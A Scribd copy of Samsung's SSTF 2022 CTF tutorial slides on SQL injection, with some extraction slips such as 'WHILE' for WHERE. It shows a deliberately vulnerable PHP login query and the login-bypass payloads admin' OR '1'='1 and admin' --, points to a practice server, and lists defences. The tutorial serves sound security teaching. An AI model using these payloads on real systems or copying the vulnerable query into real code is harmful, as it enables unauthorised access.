0% found this document useful (0 votes)
74 views22 pages

Sqli

The document provides an introduction to SQL injection vulnerabilities, explaining that they occur when malicious SQL statements are inserted into user input fields and executed by the backend database. It describes how attackers can exploit these vulnerabilities to dump database contents or login as administrators. The document then demonstrates how SQL injection works through examples, and recommends input validation and prepared statements as ways to prevent SQL injection attacks.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
74 views22 pages

Sqli

The document provides an introduction to SQL injection vulnerabilities, explaining that they occur when malicious SQL statements are inserted into user input fields and executed by the backend database. It describes how attackers can exploit these vulnerabilities to dump database contents or login as administrators. The document then demonstrates how SQL injection works through examples, and recommends input validation and prepared statements as ways to prevent SQL injection attacks.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 22

en_US

Samsung Research

SSTF 2022|Hacker’s Playground

Tutorial Guide
SQLi 101
Web
SQL SQL(Structured Query Language) injection is a code injection tech-
nique, used to attack data-driven applications, in which malicious SQL

Injection? statements are inserted into an entry field for execution (e.g. to dump
the database contents to the attacker).

SQL injection must exploit a security vulnerability in an application's


software, for example, when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed.

https://en.wikipedia.org/wiki/SQL_injection

2
Old, but steady

3
Web application attack statistics: 2017 in review,
Introduction to the SQL

SELECT statement
▪ Used to select(retrieve) records from a database. ‘users’ table
▪ Syntax: SELECT col1, col2, … FROM table_name ;
idx id pw
1 James sosecure
WHERE clause
2 Mike mysecretpwd
▪ Used to filter records in the SQL statements.
▪ Syntax: WHILE condition 3 Smith mrmrssmith
▪ Logical operators such like AND, OR, etc. are available … … …

Example
SELECT * FROM `users` WHERE id='Mike' AND pw='mysecretpwd'";

4
Simple Use Case

request request

response response
USER SERVER DB

5
with general login-form

user_id

password

6
Server Implementation

user_id
password

request SQL query

response response
USER SERVER DB

$query = "SELECT * FROM `users` WHERE id='{$_GET['id']}' AND pw='{$_GET['pw']}'";

7
Login Request

user_id
password

request SQL query

response response
USER SERVER DB

https://server/login?id=user_id&pw=password

8
Query Construction

user_id
password

request SQL query

response response
USER SERVER DB

$query = "SELECT * FROM `users` WHERE id='user_id' AND pw='password'";

9
Actual Query

user_id
password

request SQL query

response response
USER SERVER DB

SELECT * FROM `users` WHERE id='user_id' AND pw='password'

10
Malicious Request

user
password

request SQL query

response response
USER SERVER DB

https://server/login?id=admin' OR '1'='1&pw=whatever

11
Query Construction

user
password

request SQL query

response response
USER SERVER DB

$query = "SELECT * FROM `users` WHERE id='admin' OR '1'='1' AND pw='whatever'";

12
Actual Query

user
password

request SQL query

response response
USER SERVER DB

SELECT * FROM `users` WHERE id='admin' OR '1'='1' AND pw='whatever'

True for Always False


'admin' record
13
Prevent SQL Injection

user
password

request request

response response
USER SERVER DB

Strong input validation Use of custom error pages


Use of parameterized queries or stored procedures …

14
15
16
Quiz #1

Just try: Replay hacker’s attack in the previous description.

The server is running at


▪ http://sqli101.sstf.site/step1.php

17
Solution for Quiz #1

You could login as 'admin' like a hacker!

18
Let’s practice

19
Challenge Definition

Same as Quiz #1, but


▪ “OR” is now allowed.

20
Removing unnecessary parts

What we want
▪ SELECT * FROM users WHERE id='admin'
▪ Nothing after WHERE clause.

Comment out
▪ '--' or '##' indicates comment in SQL.
▪ SQL statements after '--' or '#' are regarded as comments,
and not be processed.
▪ We can insert '--' or '#' into the SQL statement
to nullify unnecessary clauses.

21
Not so complex at all

Give it a shot!

SELECT * FROM `users` WHERE id='admin' -- ' AND pw='whatever'

Actual SQL statement Commented out

22

You might also like